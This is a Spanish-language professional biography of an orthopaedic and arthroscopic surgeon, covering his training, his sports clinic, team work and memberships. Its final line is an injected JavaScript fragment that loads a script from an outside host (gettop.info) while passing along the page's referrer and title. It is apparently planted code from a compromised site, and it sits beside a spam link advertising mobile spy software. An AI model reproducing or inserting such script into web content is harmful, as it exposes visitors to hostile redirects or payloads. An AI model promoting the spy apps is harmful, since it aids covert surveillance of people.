DR. ARTURO ALMAZAN DIAZ

 

Soy un médico Mexicano egresado de la Facultad de Medicina de la Universidad La Salle. Realice la especialidad de Traumatología y Ortopedia en el Hospital Lomas Verdes del IMSS, la subespecialidad en Cirugía Artroscópica en la Clínica de Medicina del Deporte de la Universidad de Carleton en Ottawa Canadá y un entrenamiento sobre el tratamiento quirúrgico de las fracturas en el Hospital Zentralklinikum de Augsburg en Alemania.

Soy el fundador y director de la Clínica del Deporte MX donde atiendo lesiones relacionadas con la práctica deportiva, pero también lesiones degenerativas (desgaste, artritis, etc). He trabajado como cirujano consultor para equipos profesionales de fútbol como Atlante, León, San Luis, y también en equipos universitarios UNAM e Ibero.

Actualmente atiendo las lesiones quirúrgicas del Club Pumas y la Selección Nacional Femenil.

 

 

Estoy certificado por el Consejo Mexicano de Ortopedia,  soy miembro de la Arthroscopy Association of North America, de la Asociación Mexicana de Cirugía Reconstructiva Articular y Artroscopia, y del Colegio Mexicano de Ortopedia. Soy el primer y único miembro latinoamericano del ACL Study Group.

Soy autor de numerosas publicaciones nacionales y extranjeras sobre lesiones deportivas y técnicas de cirugía artroscópica. Actualmente soy el director del Capítulo de Artroscopía del Colegio Mexicano de Ortopedia.

Tengo especial interés en la enseñanza y el mejoramiento de la cirugía artroscópica y la medicina deportiva. Soy estudioso y practicante del Triatlón, pertenezco al equipo Endurance Team.

 
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.